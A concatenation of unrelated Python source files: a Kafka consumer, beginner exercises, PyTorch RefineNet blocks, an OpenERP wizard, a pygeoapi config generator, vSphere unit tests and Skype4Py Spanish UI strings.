DEFAULT_QUEUED_MAX_MESSAGES_KBYTES, } _logger.debug(f"Kafka Consumer Config: {consumer_config}") self._consumer = Consumer(consumer_config) # subscribe to topic self._debug(f"Subscribing to topics: {str(topics)}") self._consumer.subscribe(topics) self._assignment: List[Any] = [] def _debug(self, msg: str): _logger.debug(f"{msg}") def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self._consumer.close() def commit(self): self._consumer.commit() def get_assignment(self): return self._consumer.assignment() def consume( self, ms: int = 500, wait_for_assignment: bool = False ) -> Optional[KafkaMessageWrapper]: """ Consumes a message from the kafka topic supplied in the constructor. optional: ms: The timeout, in seconds, to wait for a message. None is returned if no messages are consumed. wait_for_assignment: Will block until the consumer has established a connection with the broker and received at least one partition/offset assignment. """ msg = self._consumer.poll(ms / 1000) # The confluent consumer doesn't block on the constructor or poll (with timeout) # while it's connecting to the broker. In some cases, like where we're both a # producer and a consumer, we need to know that the consumer has been assigned # a partition and offset so we can begin producing. # The loop also breaks if msg is not None because if we got a message we # must have an assignment. # TODO: Need to set a timeout for this as well. while wait_for_assignment and msg is None and len(self._assignment) == 0: self._debug("Waiting for topic assignment.") self._assignment = self._consumer.assignment() msg = self._consumer.poll(ms / 1000) return None if msg is None else KafkaMessageWrapper(raw_msg=msg) <filename>python/exercicios mundo 1/ex005/ex001.py #manipulaçao de texto(onde o 3 é o inicio e o 13 e o fim uma casa antes) #isso e chamado de FATIAMENTO. frase = 'curso em video python' print(frase[3:13]) <reponame>ldept/University #!/usr/bin/env python3 import random import sys if __name__ == '__main__': nelem = int(sys.argv[1]) print(nelem) for i in range(nelem): print(random.randint(-nelem * 10, nelem * 10)) import streamlit as st from PIL import Image header = st.beta_container() description = st.beta_container() user_inputs = st.beta_container() with header: header.title("Remote Radiologist") # with description: # description.subheader("Project Description") # description.text("Write the Project Description Here!!!") with user_inputs: user_col, display_col = st.beta_columns(spec=2) uploaded_file = st.file_uploader("Upload Image", type=['png', 'jpg', 'pdf', 'jpeg']) if uploaded_file is not None: image = Image.open(uploaded_file) st.image(image, caption='Uploaded Image.', use_column_width=True) # labels = {'Covid%': 35, 'XYZ': 35, 'ABC': 30} labels = {} # call the predictor here for key, value in labels.items(): st.write(key + " : " + str(value)) class Subject: """Class for representing a subject for observers to subscribe to""" def register_observer(self, observer): """Regisures an observer to the subject""" def remove_observer(self, observer): """Removes an observer from subscribing to the subject""" def notify_observers(self): """Notifys all subscribed observers that the subject has updated""" # The observer class is implemented by all observers, # so they all have to implemented the update() method. Here # we're following Mary and Sue's lead and # passing the measurements to the observers. class Observer: """Class representation of an observer for staying up to date on a subject""" def update(self, temp, humidity, pressure): """Updates the value that the observer watches""" self.temperature = temp self.humidity = humidity self.pressure = pressure self.display() def display(self): """Displays the dispays observers information""" # weather_data now implements the subject interface. class WeatherData(Subject): """Class representation of the weather data subject""" def __init__(self): """Creates a new WeatherData object""" self.observers = [] self.temperature = 0 self.humidity = 0 self.pressure = 0 def register_observer(self, observer): """When an observer registers, we just add it to the end of the list.""" self.observers.append(observer) def remove_observer(self, observer): """When an observer wants to un-register, we just take it off the list.""" self.observers.remove(observer) def notify_observers(self): """We notify the observers when we get updated measurements from the Weather Station.""" for ob in self.observers: ob.update(self.temperature, self.humidity, self.pressure) def measurements_changed(self): """Idicates that the observers need to me updated""" self.notify_observers() def set_measurements(self, temperature, humidity, pressure): """Sets the weather datas measurements to the given measurements""" self.temperature = temperature self.humidity = humidity self.pressure = pressure self.measurements_changed() class CurrentConditionsDisplay(Observer): """Class representation of a current condition dispaly""" def __init__(self, weather_data): """Creates a new CurrentConditionsDispaly object""" self.temperature = 0 self.humidity = 0 self.pressure = 0 self.weather_data = weather_data # save the ref in an attribute. weather_data.register_observer(self) # register the observer # so it gets data updates. def display(self): """Displays the current conditions""" print("Current conditions:", self.temperature, "F degrees and", self.humidity,"[%] humidity", "and pressure", self.pressure) print("========================") # implement StatisticsDisplay class and ForecastDisplay class. class StatisticsDisplay(Observer): """Class representation of a statistics display""" def __init__(self, weather_data): """Creats a new StatisitcDispaly object that observes the given weather data subject""" self.temperature = 0 self.temperatures = [] self.humidity = 0 self.humidities = [] self.pressure = 0 self.pressures = [] self.weather_data = weather_data weather_data.register_observer(self) def update(self, temp, humidity, pressure): """Updates the displays measurements and dispalys them""" self.temperatures.append(self.temperature) self.temperature = temp self.humidities.append(self.humidity) self.humidity = humidity self.pressures.append(self.pressure) self.pressure = pressure self.display() def display(self): """Displays the average, min, and max measurements""" print("Statistics") print(f"Average Temp: {sum(self.temperatures)/len(self.temperatures)}") print(f"Max Temp: {max(self.temperatures)}") print(f"Min Temp: {min(self.temperatures)}") print(f"Average Humidity: {sum(self.humidities)/len(self.humidities)}") print(f"Max Humidity: {max(self.humidities)}") print(f"Min Humidity: {min(self.humidities)}") print(f"Average Pressure: {sum(self.pressures)/len(self.pressures)}") print(f"Max Pressure: {max(self.pressures)}") print(f"Min Pressure: {min(self.pressures)}") print("========================") class ForecastDisplay(Observer): """Class representation of a forcast display""" def __init__(self, weather_data): """Creates a new ForcastDispaly object""" self.temperature = 0 self.humidity = 0 self.pressure = 0 self.weather_data = weather_data weather_data.register_observer(self) def display(self): """Dispalys the forcasts temp, humidity, and pressure""" print("Forcast") print(f"Temperature: {self.temperature + 0.11 * self.humidity + 0.2 * self.pressure}") print(f"Humidity: {self.humidity - 0.9 * self.humidity}") print(f"Pressure: {self.pressure + 0.1 * self.temperature - 0.21 * self.pressure}") print("========================") class WeatherStation: """Class representation of the weather station""" def main(self): """Creates a new WeatherStation object""" weather_data = WeatherData() current_display = CurrentConditionsDisplay(weather_data) statistics_display = StatisticsDisplay(weather_data) forecast_display = ForecastDisplay(weather_data) # Create two objects from StatisticsDisplay class and # ForecastDisplay class. Also, register them to the concrete instance # of the Subject class so they get the measurements' updates. # The StatisticsDisplay class should keep track of the min/average/max # measurements and display them. # The ForecastDisplay class shows the weather forecast based on the current # temperature, humidity and pressure. Use the following formulas : # forcast_temp = temperature + 0.11 * humidity + 0.2 * pressure # forcast_humadity = humidity - 0.9 * humidity # forcast_pressure = pressure + 0.1 * temperature - 0.21 * pressure weather_data.set_measurements(80, 65,30.4) weather_data.set_measurements(82, 70,29.2) weather_data.set_measurements(78, 90,29.2) # un-register the observers weather_data.remove_observer(current_display) weather_data.remove_observer(statistics_display) weather_data.remove_observer(forecast_display) weather_data.set_measurements(120, 100,1000) if __name__ == "__main__": w = WeatherStation() w.main() <filename>models/RefineNet/blocks.py import torch.nn as nn ''' [description] RCU block ''' class ResidualConvUnit(nn.Module): def __init__(self, features): super().__init__() self.conv1 = nn.Conv2d( features, features, kernel_size=3, stride=1, padding=1, bias=True) self.conv2 = nn.Conv2d( features, features, kernel_size=3, stride=1, padding=1, bias=False) self.relu = nn.ReLU(inplace=True) def forward(self, x): out = self.relu(x) out = self.conv1(out) out = self.relu(out) out = self.conv2(out) return out + x ''' [description] ''' class MultiResolutionFusion(nn.Module): def __init__(self, out_feats, *shapes): super().__init__() _, max_size = max(shapes, key=lambda x: x[1]) # get the maxer shape of several input feture maps self.max_size = (max_size, max_size) self.scale_factors = [] for i, shape in enumerate(shapes): feat, size = shape # if max_size % size != 0: # raise ValueError("max_size not divisble by shape {}".format(i)) # self.scale_factors.append(max_size // size) self.add_module( "resolve{}".format(i), nn.Conv2d( feat, out_feats, kernel_size=3, stride=1, padding=1, bias=False)) def forward(self, *xs): # print(self.max_size) max_size = self.max_size#xs[-1].size()[-2:] # max size of these feature, in default situation, the last data in the data-array has the biggest shape output = self.resolve0(xs[0]) if xs[0].size()[-2] != max_size[0]: output = nn.functional.interpolate( output, size=max_size, mode='bilinear', align_corners=True) for i, x in enumerate(xs[1:], 1): this_feature = self.__getattr__("resolve{}".format(i))(x) # upsamples all (smaller) feature maps to the largest resolution of the inputs if xs[i].size()[-2] != max_size[0]: this_feature = nn.functional.interpolate( this_feature, size=max_size, mode='bilinear', align_corners=True) output += this_feature return output ''' [description] chained residual pool ''' class ChainedResidualPool(nn.Module): def __init__(self, feats): super().__init__() self.relu = nn.ReLU(inplace=True) # two pool-block for i in range(1, 3): self.add_module( "block{}".format(i), nn.Sequential( nn.MaxPool2d(kernel_size=5, stride=1, padding=2), # obtain the raw feature map size nn.Conv2d( feats, feats, kernel_size=3, stride=1, padding=1, bias=False))) def forward(self, x): x = self.relu(x) path = x for i in range(1, 3): path = self.__getattr__("block{}".format(i))(path) x = x + path return x class ChainedResidualPoolImproved(nn.Module): def __init__(self, feats): super().__init__() self.relu = nn.ReLU(inplace=True) for i in range(1, 5): self.add_module( "block{}".format(i), nn.Sequential( nn.Conv2d( feats, feats, kernel_size=3, stride=1, padding=1, bias=False), nn.MaxPool2d(kernel_size=5, stride=1, padding=2))) def forward(self, x): x = self.relu(x) path = x for i in range(1, 5): path = self.__getattr__("block{}".format(i))(path) x += path return x class BaseRefineNetBlock(nn.Module): def __init__(self, features, residual_conv_unit, multi_resolution_fusion, chained_residual_pool, *shapes): super().__init__() for i, shape in enumerate(shapes): feats = shape[0] # channel-num of this stage's output feature map self.add_module( "rcu{}".format(i), nn.Sequential( residual_conv_unit(feats), residual_conv_unit(feats))) # stage-4 of ResNet needn't have to use 'multi_resolution_fusion' if len(shapes) != 1: self.mrf = multi_resolution_fusion(features, *shapes) else: self.mrf = None self.crp = chained_residual_pool(features) self.output_conv = residual_conv_unit(features) def forward(self, *xs): rcu_xs = [] # multi-resolution input fusion for i, x in enumerate(xs): rcu_xs.append(self.__getattr__("rcu{}".format(i))(x)) # Multi-resolution Fusion if self.mrf is not None: out = self.mrf(*rcu_xs) else: out = rcu_xs[0] # Chained Residual Pooling out = self.crp(out) # Output Conv. return self.output_conv(out) class RefineNetBlock(BaseRefineNetBlock): def __init__(self, features, *shapes): super().__init__(features, ResidualConvUnit, MultiResolutionFusion, ChainedResidualPool, *shapes) class RefineNetBlockImprovedPooling(nn.Module): def __init__(self, features, *shapes): super().__init__(features, ResidualConvUnit, MultiResolutionFusion, ChainedResidualPoolImproved, *shapes) class MMFBlock(nn.Module): def __init__(self, features): super(MMFBlock, self).__init__() self.downchannel = features // 2 self.relu = nn.ReLU(inplace=True) self.rgb_feature = nn.Sequential( nn.Conv2d(features, self.downchannel, kernel_size=1, stride=1, padding=0, bias=False), # downsample # nonlinear_transformations ResidualConvUnit(self.downchannel), ResidualConvUnit(self.downchannel), nn.Conv2d(self.downchannel, features, kernel_size=3, stride=1, padding=1, bias=False) # upsample ) self.hha_feature = nn.Sequential( nn.Conv2d(features, self.downchannel, kernel_size=1, stride=1, padding=0, bias=False), # downsample # nonlinear_transformations ResidualConvUnit(self.downchannel), ResidualConvUnit(self.downchannel), nn.Conv2d(self.downchannel, features, kernel_size=3, stride=1, padding=1, bias=False) # upsample ) self.ResidualPool = nn.Sequential( nn.MaxPool2d(kernel_size=5, stride=1, padding=2), # obtain the raw feature map size nn.Conv2d( features, features, kernel_size=3, stride=1, padding=1, bias=False)) def forward(self, rgb, hha): rgb_fea = self.rgb_feature(rgb) hha_fea = self.hha_feature(hha) fusion = self.relu(rgb_fea + hha_fea) x = self.ResidualPool(fusion) return fusion + x<reponame>dtienq/crawl-shop<gh_stars>0 # coding=utf-8 from .product import Product from ..base.base import session_factory session = session_factory()# Copyright 2018 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. DEPS = [ 'osx_sdk', 'recipe_engine/platform', 'recipe_engine/properties', 'recipe_engine/step', ] def RunSteps(api): with api.osx_sdk('mac'): api.step('gn', ['gn', 'gen', 'out/Release']) api.step('ninja', ['ninja', '-C', 'out/Release']) def GenTests(api): for platform in ('linux', 'mac', 'win'): yield (api.test(platform) + api.platform.name(platform)) <gh_stars>1-10 from nes.processors.registers import Register class PpuMask(Register): """ 7 bit 0 ---- ---- BGRs bMmG |||| |||| |||| |||+- Greyscale (0: normal color, 1: produce a greyscale display) |||| ||+-- 1: Show background in leftmost 8 pixels of screen, 0: Hide |||| |+--- 1: Show sprites in leftmost 8 pixels of screen, 0: Hide |||| +---- 1: Show background |||+------ 1: Show sprites ||+------- Emphasize red |+-------- Emphasize green +--------- Emphasize blue """ def __init__(self, data=0): self.data = data @property def value(self): return self.data @value.setter def value(self, value): self.data = value @property def grayscale(self): return self.data & 0x01 @property def show_background_in_leftmost_8_pixels(self): return self.data & 0x02 @property def show_sprites_in_leftmost_8_pixels(self): return self.data & 0x04 @property def show_background(self): return self.data & 0x08 @property def show_sprites(self): return self.data & 0x10 @property def emphasize_red(self): return self.data & 0x20 @property def emphasize_green(self): return self.data & 0x40 @property def emphasize_blue(self): return self.data & 0x80 # -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import logging import threading from openerp import SUPERUSER_ID from openerp import tools from openerp.osv import osv from openerp.api import Environment _logger = logging.getLogger(__name__) class procurement_compute_all(osv.osv_memory): _name = 'procurement.order.compute.all' _description = 'Compute all schedulers' def _procure_calculation_all(self, cr, uid, ids, context=None): """ @param self: The object pointer. @param cr: A database cursor @param uid: ID of the user currently logged in @param ids: List of IDs selected @param context: A standard dictionary """ with Environment.manage(): proc_obj = self.pool.get('procurement.order') #As this function is in a new thread, i need to open a new cursor, because the old one may be closed new_cr = self.pool.cursor() scheduler_cron_id = self.pool['ir.model.data'].get_object_reference(new_cr, SUPERUSER_ID, 'procurement', 'ir_cron_scheduler_action')[1] # Avoid to run the scheduler multiple times in the same time try: with tools.mute_logger('openerp.sql_db'): new_cr.execute("SELECT id FROM ir_cron WHERE id = %s FOR UPDATE NOWAIT", (scheduler_cron_id,)) except Exception: _logger.info('Attempt to run procurement scheduler aborted, as already running') new_cr.rollback() new_cr.close() return {} user = self.pool.get('res.users').browse(new_cr, uid, uid, context=context) comps = [x.id for x in user.company_ids] for comp in comps: proc_obj.run_scheduler(new_cr, uid, use_new_cursor=new_cr.dbname, company_id = comp, context=context) #close the new cursor new_cr.close() return {} def procure_calculation(self, cr, uid, ids, context=None): """ @param self: The object pointer. @param cr: A database cursor @param uid: ID of the user currently logged in @param ids: List of IDs selected @param context: A standard dictionary """ threaded_calculation = threading.Thread(target=self._procure_calculation_all, args=(cr, uid, ids, context)) threaded_calculation.start() return {'type': 'ir.actions.act_window_close'} # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: from django.db import models # Create your models here. class Installation(models.Model): name = models.CharField(max_length=255) installed = models.BooleanField(default=True) created_on = models.DateTimeField(auto_now_add=True)#!/usr/bin/python3 import configparser from elasticsearch import Elasticsearch # Main Function def main(): auth = get_config_params('config.ini') # es = Elasticsearch() es = Elasticsearch([auth.get('es', 'es_endpoint')], http_auth=(auth.get('es', 'es_un'), auth.get('es', 'es_pw'))) config = """# ================================================================= # # Authors: <NAME> <<EMAIL>> # # Copyright (c) 2020 <NAME> # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without # restriction, including without limitation the rights to use, # copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following # conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # # ================================================================= server: bind: host: 0.0.0.0 port: 5000 url: http://localhost:5000 mimetype: application/json; charset=UTF-8 encoding: utf-8 language: en-US # cors: true pretty_print: true limit: 10 # templates: # path: /path/to/Jinja2/templates # static: /path/to/static/folder # css/js/img map: url: 'http://{s}.tile.osm.org/{z}/{x}/{y}.png' attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors, Points © 2012 LINZ' # manager: # name: TinyDB # connection: /tmp/pygeoapi-process-manager.db # output_dir: /tmp/ # ogc_schemas_location: /opt/schemas.opengis.net logging: level: ERROR # logfile: /tmp/pygeoapi.log metadata: identification: title: OpenDRR Web Feature Service description: Developer API for geospatial data provided by the OpenDRR platform. keywords: - land management - sustainable development - planning - natural disasters keywords_type: theme terms_of_service: http://open.canada.ca/en/open-government-licence-canada/ url: https://opendrr.github.io/ license: name: Open Government Licence - Canada url: http://open.canada.ca/en/open-government-licence-canada/ provider: name: Government of Canada; Natural Resources Canada; Lands and Minerals Sector, Geological Survey of Canada url: https://www.nrcan.gc.ca/ contact: name: <NAME> position: Project Manager address: 1500 - 605 Robson Street city: Vancouver stateorprovince: British Columbia postalcode: V6B 5J3 country: Canada phone: +01-604-666-0529 fax: +01-604-666-1124 email: <EMAIL> url: https://www.nrcan.gc.ca/ hours: Mo-Fr 08:30-16:30 instructions: During hours of service. Off on weekends. role: pointOfContact resources:\n\n""" snippet = """{0}: type: collection title: {1} description: {2} keywords: - earthquake links: - type: text/html rel: canonical title: information href: http://www.riskprofiler.ca/ hreflang: en-US extents: spatial: bbox: [-141.003,41.6755,-52.6174,83.1139] crs: http://www.opengis.net/def/crs/OGC/1.3/CRS84 temporal: begin: 2020-08-06 end: null # or empty (either means open ended) providers: - type: feature name: Elasticsearch data: """ + auth.get('es', 'es_endpoint') + """/{3} id_field: {4}""" text_file = open("../pygeoapi/opendrr.config.yml", "w") id_field = "AssetID" indices = es.indices.get('*') indices = sorted(indices) for index in indices: if (index[0] == '.'): continue if index[-2:] == "_s": id_field = "Sauid" config += " " + snippet.format(index, index, index, index, id_field) + "\n\n" text_file.write(config) text_file.close() def get_config_params(args): """ Parse Input/Output columns from supplied *.ini file """ configParseObj = configparser.ConfigParser() configParseObj.read(args) return configParseObj if __name__ == '__main__': main() <reponame>matthewbush55/python-newsfeed from .home import bp_home as home from .dashboard import bp_dashboard as dashboard from .api import bp_api as api from page_objects.home_page import HomePage from setup.setup import UITest class TestHomePage(UITest): def test_page_load(self): home_page = HomePage(self.driver).open() assert home_page.is_page_loaded() def test_mit_page_link(self): home_page = HomePage(self.driver).open() mit_license_page = home_page.open_mit_license_page() assert mit_license_page.is_page_loaded() <reponame>huadream/networking-vsphere # Copyright (c) 2014 Hewlett-Packard Development Company, L.P. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import mock from oslo_vmware import api from oslo_vmware import vim from networking_vsphere.tests import base from networking_vsphere.utils import vim_session class TestVmwareApiSession(base.TestCase): def setUp(self): super(TestVmwareApiSession, self).setUp() self.host_ip = "192.168.1.3" self.host_username = "user" self.host_password = "password" self.api_retry_count = 2 self.wsdl_url = "fake_url" self.ca_cert = "fake_cert" self.connection_timeout = 120 self.vm_session = vim_session.VMWareAPISession(self.host_ip, self.host_username, self.host_password, self.api_retry_count, self.wsdl_url, self.ca_cert, self.connection_timeout, create_session=False) @mock.patch.object(api.VMwareAPISession, "invoke_api") def test_call_method(self, mock_invoke_ob): with mock.patch.object(self.vm_session, "_is_vim_object", return_value=True): self.vm_session._call_method("fake_module", "get_objects", "HostSystem", ['name']) self.assertTrue(mock_invoke_ob.called) @mock.patch.object(api.VMwareAPISession, "invoke_api") @mock.patch.object(api.VMwareAPISession, "vim") def test_call_method_with_vim_object_false(self, mock_vim_prop, mock_invoke_ob): vim.Vim = mock.Mock() mock_vim_prop.return_value = vim.Vim with mock.patch.object(self.vm_session, "_is_vim_object", return_value=False): self.vm_session._call_method("fake_module", "get_objects", "HostSystem", ['name']) self.assertTrue(mock_invoke_ob.called) @mock.patch.object(api.VMwareAPISession, "vim") def test_get_vim(self, mock_vim_prop): vim.Vim = mock.Mock(return_value="fake_vim") mock_vim_prop.return_value = vim.Vim new_vim = self.vm_session._get_vim() self.assertEqual(new_vim, self.vm_session.vim) class TestConnectionHandler(base.TestCase): def setUp(self): super(TestConnectionHandler, self).setUp() self.host_ip = "192.168.1.3" self.host_username = "user" self.host_password = "password" self.api_retry_count = 2 self.wsdl_url = "fake_url" self.ca_cert = 'fake_cert' self.connection_timeout = 120 def test_create_connection(self): vim_session.ConnectionHandler.set_vc_details(self.host_ip, self.host_username, self.host_password, self.api_retry_count, self.wsdl_url, self.ca_cert, self.connection_timeout) vim_session.ConnectionHandler.create_session = False vm_session = vim_session.ConnectionHandler.create_connection() self.assertEqual(vim_session.ConnectionHandler.host_ip, self.host_ip) self.assertEqual(vim_session.ConnectionHandler.host_username, self.host_username) self.assertEqual(vim_session.ConnectionHandler.host_password, self.host_password) self.assertEqual(vim_session.ConnectionHandler.api_retry_count, 2) self.assertEqual(vim_session.ConnectionHandler.wsdl_url, self.wsdl_url) self.assertTrue(vm_session) def test_connection_handler_stop(self): vim_session.ConnectionHandler.set_vc_details(self.host_ip, self.host_username, self.host_password, self.api_retry_count, self.wsdl_url, self.ca_cert, self.connection_timeout) vim_session.ConnectionHandler.create_session = False vim_session.ConnectionHandler.create_connection() with mock.patch.object(api.VMwareAPISession, "logout") as log_ob: vim_session.ConnectionHandler.stop() self.assertTrue(log_ob.called) self.assertTrue(vim_session.ConnectionHandler.stopped) def test_connection_handler_start(self): vim_session.ConnectionHandler.start() self.assertFalse(vim_session.ConnectionHandler.stopped) def test_get_connection(self): vim_session.ConnectionHandler.set_vc_details(self.host_ip, self.host_username, self.host_password, self.api_retry_count, self.wsdl_url, self.ca_cert, self.connection_timeout) vim_session.ConnectionHandler.create_session = False vm_session = vim_session.ConnectionHandler.create_connection() new_session = vim_session.ConnectionHandler.get_connection() self.assertEqual(vm_session, new_session) <filename>Skype4Py/lang/es.py<gh_stars>100-1000 apiAttachAvailable = u'API disponible' apiAttachNotAvailable = u'No disponible' apiAttachPendingAuthorization = u'Autorizaci\xf3n pendiente' apiAttachRefused = u'Rechazado' apiAttachSuccess = u'Conectado' apiAttachUnknown = u'Desconocido' budDeletedFriend = u'Borrado de la lista de contactos' budFriend = u'Contacto' budNeverBeenFriend = u'Nunca estuvo en la lista de contactos' budPendingAuthorization = u'Autorizaci\xf3n pendiente' budUnknown = u'Desconocido' cfrBlockedByRecipient = u'Llamada bloqueada por el destinatario' cfrMiscError = u'Error de car\xe1cter general' cfrNoCommonCodec = u'Ning\xfan c\xf3dec com\xfan' cfrNoProxyFound = u'No se encontr\xf3 proxy' cfrNotAuthorizedByRecipient = u'El usuario actual no est\xe1 autorizado por el destinatario' cfrRecipientNotFriend = u'El destinatario no es un contacto' cfrRemoteDeviceError = u'Existe un problema con el dispositivo de sonido remoto' cfrSessionTerminated = u'Sesi\xf3n terminada' cfrSoundIOError = u'Error de E/S de sonido' cfrSoundRecordingError = u'Error de grabaci\xf3n de sonido' cfrUnknown = u'Desconocido' cfrUserDoesNotExist = u'El usuario o el n\xfamero telef\xf3nico no existen' cfrUserIsOffline = u'Est\xe1 desconectado/a' chsAllCalls = u'Di\xe1logos heredados' chsDialog = u'Di\xe1logo' chsIncomingCalls = u'Esperando aceptaci\xf3n grupal' chsLegacyDialog = u'Di\xe1logos heredados' chsMissedCalls = u'Di\xe1logo' chsMultiNeedAccept = u'Esperando aceptaci\xf3n grupal' chsMultiSubscribed = u'Grupal suscrita' chsOutgoingCalls = u'Grupal suscrita' chsUnknown = u'Desconocido' chsUnsubscribed = u'No suscrito' clsBusy = u'Ocupado' clsCancelled = u'Cancelado' clsEarlyMedia = u'Reproduciendo medios iniciales (Early Media)' clsFailed = u'Perd\xf3n, llamada fallida!' clsFinished = u'Finalizada' clsInProgress = u'Llamada en curso' clsLocalHold = u'En espera local' clsMissed = u'Llamada perdida' clsOnHold = u'En espera' clsRefused = u'Rechazado' clsRemoteHold = u'En espera remota' clsRinging = u'helistanud' clsRouting = u'Enrutando' clsTransferred = u'Desconocido' clsTransferring = u'Desconocido' clsUnknown = u'Desconocido' clsUnplaced = u'Nunca se realiz\xf3' clsVoicemailBufferingGreeting = u'Almacenando saludo en el b\xfafer' clsVoicemailCancelled = u'Mensaje de voz cancelado' clsVoicemailFailed = u'Fallo del buz\xf3n del voz' clsVoicemailPlayingGreeting = u'Reproduciendo saludo' clsVoicemailRecording = u'Grabando mensaje de voz' clsVoicemailSent = u'Mensaje de voz enviado' clsVoicemailUploading = u'Cargando mensaje de voz' cltIncomingP2P = u'Llamada recibida de par a par' cltIncomingPSTN = u'Llamada recibida' cltOutgoingP2P = u'Llamada realizada de par a par' cltOutgoingPSTN = u'Llamada realizada' cltUnknown = u'Desconocido' cmeAddedMembers = u'Miembros agregados' cmeCreatedChatWith = u'Conversaci\xf3n iniciada con' cmeEmoted = u'Desconocido' cmeLeft = u'Conversaci\xf3n abandonada' cmeSaid = u'Dijo' cmeSawMembers = u'Mi<NAME>' cmeSetTopic = u'Definici\xf3n del tema' cmeUnknown = u'Desconocido' cmsRead = u'Le\xeddo' cmsReceived = u'Recibido' cmsSending = u'Enviando...' cmsSent = u'Enviado' cmsUnknown = u'Desconocido' conConnecting = u'Conectando' conOffline = u'Desconectado' conOnline = u'Conectado' conPausing = u'En pausa' conUnknown = u'Desconocido' cusAway = u'Ausente' cusDoNotDisturb = u'Ocupado' cusInvisible = u'Invisible' cusLoggedOut = u'Desconectado' cusNotAvailable = u'No disponible' cusOffline = u'Desconectado' cusOnline = u'Conectado' cusSkypeMe = u'Skyp\xe9ame' cusUnknown = u'Desconocido' cvsBothEnabled = u'Enviando y recibiendo video' cvsNone = u'Sin video' cvsReceiveEnabled = u'Recibiendo video' cvsSendEnabled = u'Enviando video' cvsUnknown = u'' grpAllFriends = u'Todos los contactos' grpAllUsers = u'Todos los usuarios' grpCustomGroup = u'Personalizado' grpOnlineFriends = u'Contactos conectados' grpPendingAuthorizationFriends = u'Autorizaci\xf3n pendiente' grpProposedSharedGroup = u'Proposed Shared Group' grpRecentlyContactedUsers = u'Usuarios contactados recientemente' grpSharedGroup = u'Shared Group' grpSkypeFriends = u'Contactos de Skype' grpSkypeOutFriends = u'Contactos de SkypeOut' grpUngroupedFriends = u'Contactos no agrupados' grpUnknown = u'Desconocido' grpUsersAuthorizedByMe = u'Autorizado por m\xed' grpUsersBlockedByMe = u'Bloqueado por m\xed' grpUsersWaitingMyAuthorization = u'Esperando mi autorizaci\xf3n' leaAddDeclined = u'Agregado rechazado' leaAddedNotAuthorized = u'La persona agregada deber estar autorizada' leaAdderNotFriend = u'Quien agrega debe ser un contacto' leaUnknown = u'Desconocido' leaUnsubscribe = u'No suscrito' leaUserIncapable = u'Usuario inhabilitado' leaUserNotFound = u'No se encontr\xf3 el usuario' olsAway = u'Ausente' olsDoNotDisturb = u'Ocupado' olsNotAvailable = u'No disponible' olsOffline = u'Desconectado' olsOnline = u'Conectado' olsSkypeMe = u'Skyp\xe9ame' olsSkypeOut = u'SkypeOut' olsUnknown = u'Desconocido' smsMessageStatusComposing = u'Composing' smsMessageStatusDelivered = u'Delivered' smsMessageStatusFailed = u'Failed' smsMessageStatusRead = u'Read' smsMessageStatusReceived = u'Received' smsMessageStatusSendingToServer = u'Sending to Server' smsMessageStatusSentToServer = u'Sent to Server' smsMessageStatusSomeTargetsFailed = u'Some Targets Failed' smsMessageStatusUnknown = u'Unknown' smsMessageTypeCCRequest = u'Confirmation Code Request' smsMessageTypeCCSubmit = u'Confirmation Code Submit' smsMessageTypeIncoming = u'Incoming' smsMessageTypeOutgoing = u'Outgoing' smsMessageTypeUnknown = u'Unknown' smsTargetStatusAcceptable = u'Acceptable' smsTargetStatusAnalyzing = u'Analyzing' smsTargetStatusDeliveryFailed = u'Delivery Failed' smsTargetStatusDeliveryPending = u'Delivery Pending' smsTargetStatusDeliverySuccessful = u'Delivery Successful' smsTargetStatusNotRoutable = u'Not Routable' smsTargetStatusUndefined = u'Undefined' smsTargetStatusUnknown = u'Unknown' usexFemale = u'Mujer' usexMale = u'Hombre' usexUnknown = u'Desconocido' vmrConnectError = u'Error de conexi\xf3n' vmrFileReadError = u'Error de lectura en archivo' vmrFileWriteError = u'Error de escritura en archivo' vmrMiscError = u'Error de car\xe1cter general' vmrNoError = u'No se produjo error' vmrNoPrivilege = u'Sin privilegio de mensaje de voz' vmrNoVoicemail = u'Sin mensaje de voz' vmrPlaybackError = u'Error de reproducci\xf3n' vmrRecordingError = u'Error de grabaci\xf3n' vmrUnknown = u'Desconocido' vmsBlank = u'En blanco' vmsBuffering = u'Almacenando' vmsDeleting = u'Borrando' vmsDownloading = u'Descargando' vmsFailed = u'No enviado' vmsNotDownloaded = u'No se descarg\xf3' vmsPlayed = u'Reproducido' vmsPlaying = u'Reproduciendo' vmsRecorded = u'Grabado' vmsRecording = u'Grabando mensaje de voz' vmsUnknown = u'Desconocido' vmsUnplayed = u'No se reprodujo' 